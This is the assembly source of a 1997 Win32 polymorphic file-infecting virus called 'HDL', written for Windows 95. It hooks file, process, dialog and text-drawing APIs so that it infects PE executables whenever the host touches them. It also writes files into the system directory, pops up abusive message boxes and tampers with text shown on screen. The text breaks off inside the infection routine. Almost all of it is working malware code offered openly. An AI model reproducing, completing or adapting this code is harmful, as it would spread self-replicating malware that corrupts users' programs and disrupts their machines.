title HDL - The pretty PE Polymorphic virus. page 52,130 ; *==================================================================* ; ! (c) 08-Sep-1997y by TechnoRat "95-th Harrier from DarkLand" ! ; *==================================================================* ; ; Start coding: 27-Jul-1997y Ver 2.00a ; Still coding: 04-Sep-1997y Ver 2.01a ; Stop coding: 08-Sep-1997y Ver 2.01a ; Bug fixing: 10-Sep-1997y Ver 2.01b ; Upgrading: 14-Sep-1997y Ver 2.01b ; Bug fixing: 17-Sep-1997y Ver 2.01! ; ; ; Win32 Virus. (c)*TR*SOFT 27-Jul-1997y ; ; Compatible: MS Windows 95 (v4.0+); ; Structure: many levels polymorphic style; ; Infector: written as Win32 console application; ; Infect: all files by type NewExe (PE); ; Check: attributes, date & time, IO errors, synchronization; ; Devil: text strings on screen, message boxes, help, ; Control Panel (System applet); ; Lock: -=- nothing -=- ; Code: pretty fucking style; ; .386 ; Party goes to begin. . . .Model Flat,StdCall %NoMacs Include ..\HarrInc.Inc ; --------------------------------------------------------- ; Data section must be present. Data size must be non-zero. .Data Dumbo Db 'For fucking TASM32+TLINK32 programs!',0 ; --------------------------------------------------------- .Code Public StubEntryLabel ; Some definitions Public StubImportPlace ; placed specially Public ImagePlace ; for PELinker Public CurrentPlace Public FixUpsPlace Public FixUpsCounter Public ImportPlace Public ImportLength Public BufferPlace ; --------------------------------------------------------- MaxPathLen = 260 ; --------------------------------------------------------- Cr Equ <0Dh,0Ah> ; Service macroses Ver Equ <'v2.01 '> Release Equ <'Release (0) from 17-Sep-1997y '> BasedOn Equ <'based on [AsmSwap engine v1.3]'> ; --------------------------------------------------------- ; Stack memory addressing macroses MemCommitSz = 38000h ; Stack memory size TinyMemCommitSz = 2000h ; WARNING! depends on ; total program size. _VarAddr = 0 ; Base of indexing Var Macro VarName,VarType &VarName CatStr <[>,%_VarAddr,<][EBp]> ; Defining the new If Type VarType Eq 0 ; variable reference _VarAddr = _VarAddr+VarType Else _VarAddr = _VarAddr+Type VarType EndIf EndM Var ; --------------------------------------------------------- ; Binary include support BFile Macro ILabel,IFileName,IFileSize &ILabel Label Byte _BFileStart = $ Irpc Char,IFileName Db '&Char' EndM Db (IFileSize-($-_BFileStart)) Dup(90h) EndM BFile ; --------------------------------------------------------- DebugModeKey = 0h ; defining the Debug Irpc Char, ; Mode switcher key DebugModeKey = ((DebugModeKey Xor '&Char')-1) Shl 1 EndM ; --------------------------------------------------------- _Jmp Macro Addr ; Macroses that supports Jmp Addr ; AsmSwap scrambling EndM _Jmp _Nop Macro Addr EndM _Nop ; --------------------------------------------------------- ; Here the start of running code. Start: ; Here can be placed ; the polymorphic decryptor, ; And will be placed! ; But later. ;StartCode ;Separator=_Jmp ; --------------------------------------------------------- ;Here the real virus body. BodyHere: PushA Cld ; Need after decrypting! FirstCm: Call SecondCm Xor EAx,EAx ; Some trash Ret ; will never work!!! SecondCm: Xor EAx,EAx ; Some another trash Pop EBx ; Real body. . . Sub EBx,(Offset FirstCm - Offset Start + 5) Xor EAx,EAx ; Wait on semaphore WaitInit: Xchg EAx,[EBx][Offset InitOk - Offset Start] Or EAx,EAx Jz WaitInit Cmp EAx,2h ; Ok, All done. Je DoneInit ;DefCodeLine Db 0BEh FixUpsPlace Dd ? ; Mov ESi,xxxx ;BreakCodeLine ;DefCodeLine Db 0B9h FixUpsCounter Dd ? ; Mov ECx,xxxx ;BreakCodeLine Again: Mov EDi,[EBx+ESi] Add [EBx+EDi],EBx ; SetUp ReloItems Add ESi,4h Dec ECx Jnz Again Mov Here,EBx Mov EAx,StubEntryLabel ; Calculate the Add EAx,EBx ; Host entry point Sub EAx,CurrentPlace ; and place it for future Sub EAx,PolyMorphSz Mov HostIP,EAx Sub EBx,CurrentPlace Sub EBx,PolyMorphSz Mov MemBase,EBx Mov Debug,0h ; Checking for debug Call GetEnvironmentStringsA ; mode presence. . . New_Key: Xor EBx,EBx New_Char: Cmp Byte Ptr [EAx],0h ; Calculate hash from Je Check_Key ; Env. string Xor Bl,[EAx] Dec EBx Shl EBx,1 Inc EAx Jmp New_Char Check_Key: Cmp EBx,DebugModeKey ; Debug key detected? Jne New_String Or Debug,-1 ; Yes! Push 0h ; (??? Not used) Call MessageBeep Push 40h ; OkOnly+Information Push Offset InfSelfHeader Push Offset InfEnterDebug Push 0h Call MessageBoxA Jmp Break_Keys New_String: Inc EAx ; No, next string Cmp Byte Ptr [EAx],0h Jne New_Key Break_Keys: Mov EAx,Offset KernelName ; SetUp import entries Mov EDx,Offset KrnlImp ; on Kernel32 And Shell32 Mov ECx,KrnlImpCnt ; And ComDlg32 DLLs Call SetUpImport Mov EAx,Offset ShellName Mov EDx,Offset ShellImp Mov ECx,ShellImpCnt Call SetUpImport Mov EAx,Offset DialogName Mov EDx,Offset DialogImp Mov ECx,DialogImpCnt Call SetUpImport Mov EAx,Offset UserName ; and User32 and GDI32 DLLs Mov EDx,Offset UserImp Mov ECx,UserImpCnt Call SetUpImport Mov EAx,Offset GDIName Mov EDx,Offset GDIImp Mov ECx,GDIImpCnt Call SetUpImport Mov HelpCounter,0h Mov wsRet$,0h ; Critical section end. DoneInit: Mov InitOk,2h ; No Writes in RAM here!!! ; Here can be implemented some initialization features. ; for Example: infecting the Export in SHELL32.dll or ; in COMDLG32.dll; or infecting the Explorer.Exe or . . . Push MemCommitSz/4h Call AllocStackMem Lea EAx,FT_Struc Push EAx Call GetSystemTime ; Get "Random" value Cmp Word Ptr FT_Second,10h Jne Go_Away Push 1000h ; OkOnly+SystemModal Push Offset InfSelfHeader Push Offset HelloMsg Push 0h Call MessageBoxA ; Fuck the society ;-) Go_Away: Lea EAx,PackedTime ; Initialize random generator Push EAx ; Can be performed at Lea EAx,FT_Struc ; any time, it is legal!!! Push EAx Call SystemTimeToFileTime Mov EAx,PackedTime Or EAx,1h Mov RandSeed,EAx Mov EAx,10h ; by 1/16 probability Call Random Or EAx,EAx Jnz NoInstallOEM Push MaxPathLen Lea EAx,SomePath ; Some nice install ;-) Push EAx ; (about the OEM) Call GetSystemDirectoryA Push EAx Lea EAx,SomePath Add EAx,[ESp] Mov EDi,EAx ; The pretty LOGO file Mov ESi,Offset BitMapName Cld Mov ECx,BitMapNameL Rep MovsB Push 0h Push 10000000h+80h ; FAN, FFRA Push 2h ; CA Push 0h Push 1h Push 80000000h+40000000h ; GR/GW Lea EAx,SomePath Push EAx Call CreateFileA Cmp EAx,-1h ; Create error! Je Fail_OEM Push EAx Push 0h Lea ECx,ProcessedBytes Push ECx Push HarrBtMpFile_Sz Push Offset BitMapFile Push EAx Call WriteFile Call CloseHandle Lea EAx,SomePath Add EAx,[ESp] Mov EDi,EAx ; The pretty INFO file Mov ESi,Offset InfoName Mov ECx,InfoNameL Rep MovsB Push 0h Push 10000000h+80h ; FAN, FFRA Push 2h ; CA Push 0h Push 1h Push 80000000h+40000000h ; GR/GW Lea EAx,SomePath Push EAx Call CreateFileA Cmp EAx,-1h ; Create error! Je Fail_OEM Push EAx Push 0h Lea ECx,ProcessedBytes Push ECx Push HarrInfoFile_Sz Push Offset InfoFile Push EAx Call WriteFile Call CloseHandle Fail_OEM: Pop EAx NoInstallOEM: Push MemCommitSz/4h Call FreeStackMem PopA Jmp HostIP ; All Done. ; --------------------------------------------------------- SetUpImport: Mov EBx,StubImportPlace ; SetUp HostImport Add EBx,Here Set_3$: Cmp DWord Ptr [EBx][3*4],0h ; (EDx/ECx, EAx) Je Set_0$ ; Corrupt all. . . Mov ESi,[EBx][3*4] ; Scan stub modules Add ESi,MemBase Mov EDi,EAx Cld Set_2$: Call CmpUnCase ; Compare two module chars Jne Set_1$ Cmp Byte Ptr [EDi][-1],0h Jne Set_2$ ; Names compared Ok. Call Set_Mdl$ ; SetUp current module. Set_1$: Add EBx,5*4 ; Next module. . . Jmp Set_3$ Set_0$: Ret ; Last module, All done. Set_Mdl$: Push EAx Mov ESi,[EBx] ; (Current Module in EBx) Or ESi,ESi ; LookUp present? Jz Set_Mdl_1$ Add ESi,MemBase Xor EAx,EAx Set_Mdl_0$: Cmp DWord Ptr [ESi],0h ; Last LookUp? Je Set_Mdl_1$ Test DWord Ptr [ESi],80000000h Jne Set_Mdl_2$ ; Ordinal? Push ESi Mov ESi,[ESi] ; Get Name in module Add ESi,MemBase Add ESi,2h Push EDx Push ECx Set_Mdl_M0$: Push ESi Mov EDi,[EDx][1*4] ; Get self Name to SetUp Set_Mdl_M2$: Call CmpUnCase Jne Set_Mdl_M1$ Cmp Byte Ptr [EDi][-1],0h Jne Set_Mdl_M2$ ; Ok, SetUp this entry Mov EDi,[EBx][4*4] ; Ptr to AddrTable Add EDi,MemBase Mov ESi,[EDi][EAx] ; ImportValue Push EDi Mov EDi,[EDx] ; SetUp _Var Mov [EDi],ESi Pop EDi Mov ESi,[EDx][2*4] ; SetUp ImportValue Mov [EDi][EAx],ESi ; by IProc Pop ESi Jmp Set_Mdl_M3$ Set_Mdl_M1$: Pop ESi Add EDx,3*4 ; Next name in list Dec ECx Jnz Set_Mdl_M0$ Set_Mdl_M3$: Pop ECx Pop EDx Pop ESi Set_Mdl_2$: Add ESi,4 ; Next name in module Add EAx,4 Jmp Set_Mdl_0$ Set_Mdl_1$: Pop EAx Ret CmpUnCase: Push EAx ; CmpsB (with UnCase check) LodsB Call UpCase Mov Ah,Al Xchg ESi,EDi LodsB Call UpCase Xchg ESi,EDi Cmp Ah,Al Pop EAx Ret UpCase: Cmp Al,'a' ; UpCase the Al register Jb UpCase_0$ Cmp Al,'z' Ja UpCase_0$ Sub Al,20h UpCase_0$: Ret ; --------------------------------------------------------- ; KERNEL32 infected functions realization. ICreateFileA: Push EBp ; CreateFileA Mov EBp,ESp ; opens or creates PushA ; the file or other Mov EDx,[EBp][8] ; resource (pipe, device, etc) Mov EBx,Offset NCreateFileA Call InfectByName PopA Pop EBp Jmp _CreateFileA IOpenFile: Push EBp ; OpenFile Mov EBp,ESp ; opens or creates PushA ; the file Mov EDx,[EBp][8] ; [Obsolete] Mov EBx,Offset NOpenFile Call InfectByName PopA Pop EBp Jmp _OpenFile IMoveFileA: Push EBp ; MoveFileA Mov EBp,ESp ; moves or renames PushA ; the file Mov EDx,[EBp][8] Mov EBx,Offset NMoveFileA Call InfectByName PopA Pop EBp Jmp _MoveFileA IMoveFileExA: Push EBp ; MoveFileExA Mov EBp,ESp ; moves or renames PushA ; the file Mov EDx,[EBp][8] ; [Not supported by '95] Mov EBx,Offset NMoveFileExA Call InfectByName PopA Pop EBp Jmp _MoveFileExA ICopyFileA: Push EBp ; CopyFileA Mov EBp,ESp ; copyes PushA ; the file Mov EDx,[EBp][8] Mov EBx,Offset NCopyFileA Call InfectByName PopA Pop EBp Jmp _CopyFileA I_lopen: Push EBp ; _lopen Mov EBp,ESp ; opens PushA ; the file Mov EDx,[EBp][8] ; [Obsolete] Mov EBx,Offset N_lopen Call InfectByName PopA Pop EBp Jmp __lopen IWinExec: Push EBp ; WinExec Mov EBp,ESp ; spawns PushA ; the file Mov EDx,[EBp][8] ; [Obsolete] Mov EBx,Offset NWinExec Call InfectByName PopA Pop EBp Jmp _WinExec ICreateProcessA: Push EBp ; CreateProcessA Mov EBp,ESp ; spawns PushA ; the file Mov EDx,[EBp][8] Mov EBx,Offset NCreateProcessA Call InfectByName PopA Pop EBp Jmp _CreateProcessA ILoadLibraryA: Push EBp ; LoadLibraryA Mov EBp,ESp ; loads the PushA ; library file Mov EDx,[EBp][8] Mov EBx,Offset NLoadLibraryA Call InfectByName PopA Pop EBp Jmp _LoadLibraryA ILoadLibraryExA: Push EBp ; LoadLibraryExA Mov EBp,ESp ; loads the PushA ; library file Mov EDx,[EBp][8] Mov EBx,Offset NLoadLibraryExA Call InfectByName PopA Pop EBp Jmp _LoadLibraryExA IFindFirstFileA: Push DWord Ptr [ESp][8] Push DWord Ptr [ESp][8] Call _FindFirstFileA Cmp EAx,-1 Je FindFirst_1$ Push EBp ; FindFirstFileA Mov EBp,ESp ; searches the PushA ; first file Mov EDx,[EBp][0Ch] Add EDx,0Bh*4 Mov EBx,Offset NFindFirstFileA Call InfectByName PopA Pop EBp FindFirst_1$: Ret 8h IFindNextFileA: Push DWord Ptr [ESp][8] Push DWord Ptr [ESp][8] Call _FindNextFileA Or EAx,EAx Je FindNext_1$ Push EBp ; FindNextFileA Mov EBp,ESp ; searches the PushA ; next file Mov EDx,[EBp][0Ch] Add EDx,0Bh*4 Mov EBx,Offset NFindNextFileA Call InfectByName PopA Pop EBp FindNext_1$: Ret 8h ; --------------------------------------------------------- ; SHELL32 infected functions realization. IShellExecuteA: Push EBp ; ShellExecuteA Mov EBp,ESp ; opens or prints PushA ; the specified file Mov EDx,[EBp][10h] ; via registry Mov EBx,Offset NShellExecuteA Call InfectByName PopA Pop EBp Jmp _ShellExecuteA IShellExecuteEx: Push EBp ; ShellExecuteEx Mov EBp,ESp ; ??? PushA ; Mov EDx,[EBp][10h] ; [UnDocumented] Mov EBx,Offset NShellExecuteEx Call InfectByName PopA Pop EBp Jmp _ShellExecuteEx IShellExecuteExA: Push EBp ; ShellExecuteExA Mov EBp,ESp ; ??? PushA ; Mov EDx,[EBp][10h] ; [UnDocumented] Mov EBx,Offset NShellExecuteExA Call InfectByName PopA Pop EBp Jmp _ShellExecuteExA IFindExecutableA: Push EBp ; FindExecutableA Mov EBp,ESp ; searches the PushA ; DDE server Mov EDx,[EBp][8] ; via registry Mov EBx,Offset NFindExecutableA Call InfectByName ; or DDE requests PopA Pop EBp Jmp _FindExecutableA ; --------------------------------------------------------- ; COMDLG32 infected functions realization. IGetOpenFileNameA: Push DWord Ptr [ESp][4] ; GetOpenFileNameA Call _GetOpenFileNameA ; returns the name Push EBp ; of opening file Mov EBp,ESp PushA Mov EDx,[EBp][8] Mov EDx,[EDx][7*4] Mov EBx,Offset NGetOpenFileNameA Call InfectByName PopA Pop EBp Ret 4h IGetSaveFileNameA: Push DWord Ptr [ESp][4] ; GetSaveFileNameA Call _GetSaveFileNameA ; returns the name Push EBp ; of saving file Mov EBp,ESp PushA Mov EDx,[EBp][8] Mov EDx,[EDx][7*4] Mov EBx,Offset NGetSaveFileNameA Call InfectByName PopA Pop EBp Ret 4h ; --------------------------------------------------------- ; USER32 infected functions realization IDrawTextA: Push EBx ; Draw text on screen Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][5*4+4] Push DWord Ptr [EBx][4*4+4] Mov ECx,[EBx][3*4+4] Mov EDx,[EBx][2*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][1*4+4] Call _DrawTextA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 5*4 IDrawTextExA: Push EBx ; Draw text on screen Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][6*4+4] Push DWord Ptr [EBx][5*4+4] Push DWord Ptr [EBx][4*4+4] Mov ECx,[EBx][3*4+4] Mov EDx,[EBx][2*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][1*4+4] Call _DrawTextExA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 6*4 ITabbedTextOutA: Push EBx ; Draw text on screen Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][8*4+4] Push DWord Ptr [EBx][7*4+4] Push DWord Ptr [EBx][6*4+4] Mov ECx,[EBx][5*4+4] Mov EDx,[EBx][4*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][3*4+4] Push DWord Ptr [EBx][2*4+4] Push DWord Ptr [EBx][1*4+4] Call _TabbedTextOutA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 8*4 IwsprintfA: Cmp wsRet$,0h ; Check semaphore! Je wsprintf_1$ Jmp _wsprintfA wsprintf_1$: Pop wsRet$ Push Offset wsprint_0$ Jmp _wsprintfA ; Format text string wsprint_0$: Push wsRet$ Push EBx Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Mov EDx,[EBx][1*4+4] Mov ECx,[EBx][-4] Call ConvertStr Mov [EBx][-4],ECx Mov ESi,EDx Mov EDi,[EBx][1*4+4] Cld Call Transfer_Str Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Mov wsRet$,0h Ret wsRet$ Dd 0h IwvsprintfA: Push EBx ; Format text string Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][3*4+4] Push DWord Ptr [EBx][2*4+4] Push DWord Ptr [EBx][1*4+4] Call _wvsprintfA Mov EDx,[EBx][1*4+4] Mov ECx,EAx Call ConvertStr Mov [EBx][-4],ECx Mov EDi,[EBx][1*4+4] Mov ESi,EDx Cld Call Transfer_Str Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx ; function result Pop EBx Ret 3*4 IGetTabbedTextExtentA: Push EBx ; Get text parameters Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][5*4+4] Push DWord Ptr [EBx][4*4+4] Mov ECx,[EBx][3*4+4] Mov EDx,[EBx][2*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][1*4+4] Call _GetTabbedTextExtentA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 5*4 IMessageBoxA: Push EBx ; Shows the some message Mov EBx,ESp Push EAx PushA Push MemCommitSz/4h Call AllocStackMem Lea EAx,FT_Struc Push EAx Call GetSystemTime ; Get "Random" value Cmp Word Ptr FT_Second,10h Jae Message_None$ MovZx EAx,Word Ptr FT_Milliseconds Shr EAx,1 Xor EDx,EDx Mov ECx,FuckMsgCounter Div ECx Shl EDx,1 Shl EDx,1 Add EDx,Offset FuckMessages Mov EDx,[EDx] Push DWord Ptr [EBx][4*4+4] Push DWord Ptr [EBx][3*4+4] Push EDx Push DWord Ptr [EBx][1*4+4] Call MessageBoxA Mov [EBx][-4h],EAx Push MemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 4*4 Message_None$: Push MemCommitSz/4h ; Legal call Call FreeStackMem PopA Pop EAx Pop EBx Jmp _MessageBoxA IWinHelpA: PushA ; Calls the Windows Cmp HelpCounter,10h ; help system Jb WinHlp_0$ Push 40h ; OkOnly+Information Push Offset InfSelfHeader Push Offset InfGodHelp Push 0h Call MessageBoxA PopA Xor EAx,EAx Ret 4*4 WinHlp_0$: Inc HelpCounter ; Legal call PopA Jmp _WinHelpA ; --------------------------------------------------------- ; GDI32 infected functions realization ITextOutA: Push EBx ; Draw text on screen Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Mov ECx,[EBx][5*4+4] Mov EDx,[EBx][4*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][3*4+4] Push DWord Ptr [EBx][2*4+4] Push DWord Ptr [EBx][1*4+4] Call _TextOutA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 5*4 IExtTextOutA: Push EBx ; Draw text on screen Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][8*4+4] Mov ECx,[EBx][7*4+4] Mov EDx,[EBx][6*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][5*4+4] Push DWord Ptr [EBx][4*4+4] Push DWord Ptr [EBx][3*4+4] Push DWord Ptr [EBx][2*4+4] Push DWord Ptr [EBx][1*4+4] Call _ExtTextOutA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 8*4 IGetTextExtentPointA: Push EBx ; Get text parameters Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][4*4+4] Mov ECx,[EBx][3*4+4] Mov EDx,[EBx][2*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][1*4+4] Call _GetTextExtentPointA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 4*4 IGetTextExtentPoint32A: Push EBx ; Get text parameters Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][4*4+4] Mov ECx,[EBx][3*4+4] Mov EDx,[EBx][2*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][1*4+4] Call _GetTextExtentPoint32A Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 4*4 IGetTextExtentExPointA: Push EBx ; Get text parameters Mov EBx,ESp Push EAx PushA Push TinyMemCommitSz/4h Call AllocStackMem Push DWord Ptr [EBx][7*4+4] Push DWord Ptr [EBx][6*4+4] Push DWord Ptr [EBx][5*4+4] Push DWord Ptr [EBx][4*4+4] Mov ECx,[EBx][3*4+4] Mov EDx,[EBx][2*4+4] Call ConvertStr Push ECx Push EDx Push DWord Ptr [EBx][1*4+4] Call _GetTextExtentExPointA Mov [EBx][-4h],EAx Push TinyMemCommitSz/4h Call FreeStackMem PopA Pop EAx Pop EBx Ret 7*4 ;Separator=_Nop ; --------------------------------------------------------- ShellName Db 'SHELL32.dll',0 ; Name of import KernelName Db 'KERNEL32.dll',0 ; providers DialogName Db 'COMDLG32.dll',0 UserName Db 'USER32.dll',0 GDIName Db 'GDI32.dll',0 ; --------------------------------------------------------- _CreateFileA Dd ? ; Thunk pointers _OpenFile Dd ? ; (Kernel) _MoveFileA Dd ? _MoveFileExA Dd ? _CopyFileA Dd ? __lopen Dd ? _WinExec Dd ? _CreateProcessA Dd ? _LoadLibraryA Dd ? _LoadLibraryExA Dd ? _FindFirstFileA Dd ? _FindNextFileA Dd ? _ShellExecuteA Dd ? ; (Shell) _ShellExecuteEx Dd ? _ShellExecuteExA Dd ? _FindExecutableA Dd ? _GetOpenFileNameA Dd ? ; (CommDlg) _GetSaveFileNameA Dd ? _DrawTextA Dd ? ; (User) _DrawTextExA Dd ? _TabbedTextOutA Dd ? _wsprintfA Dd ? _wvsprintfA Dd ? _GetTabbedTextExtentA Dd ? _MessageBoxA Dd ? _WinHelpA Dd ? _TextOutA Dd ? ; (GDI) _ExtTextOutA Dd ? _GetTextExtentPointA Dd ? _GetTextExtentPoint32A Dd ? _GetTextExtentExPointA Dd ? ; --------------------------------------------------------- NCreateFileA Db 'CreateFileA',0 ; Thunk pointer names NOpenFile Db 'OpenFile',0 NMoveFileA Db 'MoveFileA',0 NMoveFileExA Db 'MoveFileExA',0 NCopyFileA Db 'CopyFileA',0 N_lopen Db '_lopen',0 NWinExec Db 'WinExec',0 NCreateProcessA Db 'CreateProcessA',0 NLoadLibraryA Db 'LoadLibraryA',0 NLoadLibraryExA Db 'LoadLibraryExA',0 NFindFirstFileA Db 'FindFirstFileA',0 NFindNextFileA Db 'FindNextFileA',0 NShellExecuteA Db 'ShellExecuteA',0 NShellExecuteEx Db 'ShellExecuteEx',0 NShellExecuteExA Db 'ShellExecuteExA',0 NFindExecutableA Db 'FindExecutable',0 NGetOpenFileNameA Db 'GetOpenFileNameA',0 NGetSaveFileNameA Db 'GetSaveFileNameA',0 NDrawTextA Db 'DrawTextA',0 NDrawTextExA Db 'DrawTextExA',0 NTabbedTextOutA Db 'TabbedTextOutA',0 NwsprintfA Db 'wsprintfA',0 NwvsprintfA Db 'wvsprintfA',0 NGetTabbedTextExtentA Db 'GetTabbedTextExtentA',0 NMessageBoxA Db 'MessageBoxA',0 NWinHelpA Db 'WinHelpA',0 NTextOutA Db 'TextOutA',0 NExtTextOutA Db 'ExtTextOutA',0 NGetTextExtentPointA Db 'GetTextExtentPointA',0 NGetTextExtentPoint32A Db 'GetTextExtentPoint32A',0 NGetTextExtentExPointA Db 'GetTextExtentExPointA',0 ; --------------------------------------------------------- ;DefCodeLine KrnlImp Label DWord Dd Offset _CreateFileA Dd Offset NCreateFileA Dd Offset ICreateFileA Dd Offset _OpenFile Dd Offset NOpenFile Dd Offset IOpenFile Dd Offset _MoveFileA Dd Offset NMoveFileA Dd Offset IMoveFIleA Dd Offset _MoveFileExA Dd Offset NMoveFileExA Dd Offset IMoveFileExA Dd Offset _CopyFileA Dd Offset NCopyFileA Dd Offset ICopyFileA Dd Offset __lopen Dd Offset N_lopen Dd Offset I_lopen Dd Offset _WinExec Dd Offset NWinExec Dd Offset IWinExec Dd Offset _CreateProcessA Dd Offset NCreateProcessA Dd Offset ICreateProcessA Dd Offset _LoadLibraryA Dd Offset NLoadLibraryA Dd Offset ILoadLibraryA Dd Offset _LoadLibraryExA Dd Offset NLoadLibraryExA Dd Offset ILoadLibraryExA Dd Offset _FindFirstFileA Dd Offset NFindFirstFileA Dd Offset IFindFirstFileA Dd Offset _FindNextFileA Dd Offset NFindNextFileA Dd Offset IFindNextFileA KrnlImpCnt = ($ - Offset KrnlImp)/(3*4) ;BreakCodeLine ;DefCodeLine ShellImp Label DWord Dd Offset _ShellExecuteA Dd Offset NShellExecuteA Dd Offset IShellExecuteA Dd Offset _ShellExecuteEx Dd Offset NShellExecuteEx Dd Offset IShellExecuteEx Dd Offset _ShellExecuteExA Dd Offset NShellExecuteExA Dd Offset IShellExecuteExA Dd Offset _FindExecutableA Dd Offset NFindExecutableA Dd Offset IFindExecutableA ShellImpCnt = ($ - Offset ShellImp)/(3*4) ;BreakCodeLine ;DefCodeLine DialogImp Label DWord Dd Offset _GetOpenFileNameA Dd Offset NGetOpenFileNameA Dd Offset IGetOpenFileNameA Dd Offset _GetSaveFileNameA Dd Offset NGetSaveFileNameA Dd Offset IGetSaveFileNameA DialogImpCnt = ($ - Offset DialogImp)/(3*4) ;BreakCodeLine ;DefCodeLine UserImp Label DWord Dd Offset _DrawTextA Dd Offset NDrawTextA Dd Offset IDrawTextA Dd Offset _DrawTextExA Dd Offset NDrawTextExA Dd Offset IDrawTextExA Dd Offset _TabbedTextOutA Dd Offset NTabbedTextOutA Dd Offset ITabbedTextOutA Dd Offset _wsprintfA Dd Offset NwsprintfA Dd Offset IwsprintfA Dd Offset _wvsprintfA Dd Offset NwvsprintfA Dd Offset IwvsprintfA Dd Offset _GetTabbedTextExtentA Dd Offset NGetTabbedTextExtentA Dd Offset IGetTabbedTextExtentA Dd Offset _MessageBoxA Dd Offset NMessageBoxA Dd Offset IMessageBoxA Dd Offset _WinHelpA Dd Offset NWinHelpA Dd Offset IWinHelpA UserImpCnt = ($ - Offset UserImp)/(3*4) ;BreakCodeLine ;DefCodeLine GDIImp Label DWord Dd Offset _TextOutA Dd Offset NTextoutA Dd Offset ITextOutA Dd Offset _ExtTextOutA Dd Offset NExtTextOutA Dd Offset IExtTextOutA Dd Offset _GetTextExtentPointA Dd Offset NGetTextExtentPointA Dd Offset IGetTextExtentPointA Dd Offset _GetTextExtentPoint32A Dd Offset NGetTextExtentPoint32A Dd Offset IGetTextExtentPoint32A Dd Offset _GetTextExtentExPointA Dd Offset NGetTextExtentExPointA Dd Offset IGetTextExtentExPointA GDIImpCnt = ($ - Offset GDIImp)/(3*4) ;BreakCodeLine ;Separator=_Jmp ; --------------------------------------------------------- ; Infector routines InfectByName: Push MemCommitSz/4h Call AllocStackMem ; Infect file by name in EDx Cmp Debug,0h ; (Who in EBx) Je Infect_0$ Or EDx,EDx Jne Infect_D$ Push 30h ; OkOnly+Exclamation Push EBx Push Offset InfNoNameMsg Push 0h Call MessageBoxA ; [!!!For DEBUG!!!] Push MemCommitSz/4h Call FreeStackMem Ret Infect_D$: Push EBx Push EDx Push 21h ; OkCancel+Question Push EBx Push EDx Push 0h Call MessageBoxA ; [!!!For DEBUG!!!] Pop EDx Cmp EAx,1h Pop EBx Jz Infect_0$ Push 30h ; OkOnly+Exclamation Push EBx ; Infecting disabled Push Offset InfCancelMsg ; by Creator Push 0h Call MessageBoxA Push MemCommitSz/4h Call FreeStackMem Ret Infect_0$: Mov FileNamePtr,EDx ; !!!Ready and Waiting!!! Push EDx Call GetFileAttributesA ; Get file attributes Or EAx,EAx Jz Infect_F0$ Mov FileAttributes,EAx Push 80h ; File_Attribute_Normal Push DWord Ptr FileNamePtr Call SetFileAttributesA Push 0h Push 10000000h+80h ; FAN, FFRA Push 3h ; OE Push 0h Push 1h ; FSR Push 80000000h+40000000h ; GR/GW Push DWord Ptr FileNamePtr Call CreateFileA ; Try to open Cmp EAx,-1 Je Infect_F1$ Mov FileHandle,EAx Lea EAx,FileLastWrite ; Storing file Date/Time Push EAx ; for future restoring Lea EAx,FileLastAccess Push EAx Lea EAx,FileCreation Push EAx Push DWord Ptr FileHandle Call GetFileTime Lea EAx,FT_Struc ; Checking infection flag Push EAx Lea EAx,FileLastWrite Push EAx Call FileTimeToSystemTime Mov Ax,FT_Year Rol Ax,1 Xor Ax,FT_Month Ror Ax,1 Xor Ax,FT_Day Rol Ax,1 Xor Ax,FT_Hour Ror Ax,1 Xor Ax,FT_Minute Rol Ax,1 And Ax,3Ch Cmp Ax,FT_Second ; Already! Good. Je Infect_F2$ Mov NewSeconds,Ax Push 0h Lea EAx,ProcessedBytes ; Read the DOS file Push EAx ; header Push 40h Lea EAx,DosHeader Push EAx Push DWord Ptr FileHandle Call ReadFile Or EAx,EAx ; Error reading Jz Infect_F2$ Cmp DWord Ptr ProcessedBytes,40h Jne Infect_F2$ ; Readed less then 40h bytes Cmp Word Ptr DosHeader,'MZ' Je Infect_F3$ Cmp Word Ptr DosHeader,'ZM' Jne Infect_F2$ Infect_F3$: Cmp 